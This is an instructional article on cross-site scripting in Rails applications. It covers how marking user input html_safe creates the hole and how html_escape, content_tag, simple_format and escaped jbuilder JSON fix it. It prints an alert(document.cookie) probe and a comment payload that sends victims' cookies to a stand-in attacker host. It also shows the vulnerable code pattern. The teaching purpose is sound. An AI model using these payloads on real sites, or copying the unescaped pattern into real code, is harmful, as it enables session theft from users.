XSS is consistently a top web application security risk as per The Open Web Application Security Project (OWASP) .
XSS vulnerability allows hacker to execute JavaScript code that hacker has put in.
Most web applications has a form. User enters <script>alert(document.cookie)</script> in address field and hits submit. If user sees a JavaScript alert then it means user can execute the JavaScript code that user has put in. It means site has XSS vulnerability.
Almost all modern web applications have some JavaScript code. And the application executes JavaScript code. So running JavaScript code is not an issue. The issue is that in this case hacker is able to put in JavaScript code and then hacker is able to run that code. No one should be allowed to put their JavaScript code into the application.
If a hacker can execute JavaScript code then the hacker can see some other persons' cookie. Later we will see how hacker can do that.
If you are logged into an application then that application sets a cookie. That is how the application knows that you are logged in.
If a hacker can see someone else's cookie then the hacker can log in as that person by stealing cookie.
Having SSL does not protect site from XSS vulnerability.
XSS stands for Cross-site scripting. It is a very misleading name because XSS has absolutely nothing to do with cross-site. It has everything to do with a site, any site.
A practical example
It is very common to display address in a formatted way. Usually the code is something like this.
1array = [name, address1, address2, city_name, state_name, zip, country_name] 2array.compact.join('<br />')
When developer looks at the html page developer will see something like this.
<br /> tag is literally shown on the screen. Developer looks at the html markup rendered by Rails and it looks like this
So the developer comes back to code and marks the string html_safe as shown below.
1array = [name, address1, address2, city_name, state_name, zip, country_name] 2array.compact.join('<br />').html_safe
Now the browser renders the address with proper <br /> tag and the address looks nicely formatted as shown below.
The developer is happy and the developer moves on.
However notice that developer has marked user input data like address1 as html_safe and that's dangerous.
Hacker in action
The application has a number of users and everything is running smoothly. All the users are seeing properly formatted address. And then one day a hacker tried to hack the site. The hacker puts in address1 as <script>alert(document.cookie)</script>.
Now the hacker will see a JavaScript alert which might look like this.
If we look at the html markup then the html might look like this.
1John Smith<br /><script>alert(document.cookie)</script><br />Suite #110 2<br />Miami<br />FL<br />33027<br />USA
Hacker had put in <script> and the application sent that code to browser. Browser did its job. It executed the JavaScript code and in the process hacker is able to see the cookie.
How would hacker steal someone else's information.
Let's say that an application has a comment form. In the comment form hacker puts in comment as following.
<script> window.location='http://hacker-site.com?cookie='+document.cookie </script>
Next day another user,Mary, comes to the site and logs in. She is reading the same post and that post has a lot of comments and one of the comments is comment posted by the hacker.
The application loads all the comments including the comment posted by the hacker.
When browser sees JavaScript code then browser executes it. And now Mary's cookie information has been sent to hacker-site and Mary is not even aware of it.
This is a classic case of XSS attack and this is how hacker can next time login as Mary just by using her cookie information.
Fixing XSS
Now that we know how hacker might be able to execute JavaScript code on our application question is how do we prevent it.
Well there is only way to prevent it. And that is do not send <script> tag to the browser. If we send <script> tag to the browser then browser will execute that JavaScript.
So what can we do so that <script> tag is not sent to the browser.
Rails default behavior is to keep things secure
Before we start looking at solutions lets revisit what happened when earlier we did not mark content as html_safe. So let's remove html_safe and lets try to see the content posted by the hacker.
So the code without html_safe would look like this.
1array = [name, address1, address2, city_name state_name, zip, country_name] 2array.compact.join('<br />')
And if we execute this code then hackers address would look like this.
1John Smith<br /><script>alert(document.cookie)</script><br />Suite #110<br />Miami<br />FL<br />33027<br />USA
Notice that in this case no JavaScript alert was seen. Hacker gets to see the address hacker had posted. Why is that. To answer that let's look at the html markup.
1John Smith<br /><script>alert(document.cookie)</script>< 2br />Suite #110<br />Miami<br />FL<br />33027<br />USA
As we can see Rails did not render the address exactly as it was posted by the hacker. Rails did something because of which <script> turned into <script>.
Rails html escaped the content by using method html_escape.
By default Rails assumes that all content is not safe and thus Rails subjects all content to html_escape method.
Problem is that here we are trying to format the content using <br /> and Rails is escaping that also. We need to escape only the user content and not escape <br />. Here is how we can do that.
1array = [name, address1, address2, city_name, state_name, zip, country_name] 2array.compact.map{ |i| ERB::Util.html_escape(i) }.join('<br />').html_safe
In the above case we are marking the content as html_safe because we subjected the content through html_escape and now we are sure that no unescaped user content can go through.
This will show address in the browser like this.
Above solution worked. <br /> is not escaped and user input was properly escaped.
Another solution using content_tag
In the above case we used html_escape and it worked. However if we need to add say <strong> tag then adding the opening tag and then closing tag could be quite cumbersome. For such cases we can use content_tag
By default content_tag escapes the input text.
1array = [name, address1, address2, city_name, state_name, zip, country_name] 2array.compact.map{ |i| ActionController::Base.helpers.content_tag(:strong, i) }.join('').html_safe
simple_format for simple formatting
If you want to format the text a little bit then you can use simple_format . If user enters a bunch of text in text area then simple_format can help make the text look pretty without compromising security. It will strip away <script> and security sensitive tags. html_escape internally uses sanitize method. Note that simple_format will remove script tag while solutions like html_escape will preserve script tag in escaped format.
Handling JSON data
We use jbuilder and view looks like this.
1json.user do 2 json.name @user.name 3 json.address1 @user.address1 4 json.address2 @user.address2 5 json.city_name @user.city_name 6 json.state_name @user.state_name 7 json.zip @user.zip 8 json.country_name @user.country_name 9end
This will produce JSON structure as shown below.
On the client side there is JavaScript code to display the content. $('body').append(data.about) does the job. Well when that content is added to DOM then browser will execute JavaScript code and now we are back to the same problem.
There are two ways we can handle this problem. We can send the data as it is in JSON format. Then it is a responsibility of client side JavaScript code to append data in such a way that html tags like script are not executed.
jQuery provides text(input) method which escapes input value. Here is an example.
In this case the entire responsibility of escaping the content rests on JavaScript. While using the data JavaScript code constantly needs to be aware of which content is user input and must be escaped and which content is not user input.
That is why we favor the solution where JSON content is escaped to begin with. For escaping the content we can use h or html_escape helper method.
1json.user do 2 json.name h(@user.name) 3 json.address1 h(@user.address1) 4 json.address2 h(@user.address2) 5 json.city_name h(@user.city_name) 6 json.state_name h(@user.state_name) 7 json.zip h(@user.zip) 8 json.country_name h(@user.country_name) 9end
As you can see the user content is escaped. Now this data can be sent to client side and we do not need to worry about script tag being executed.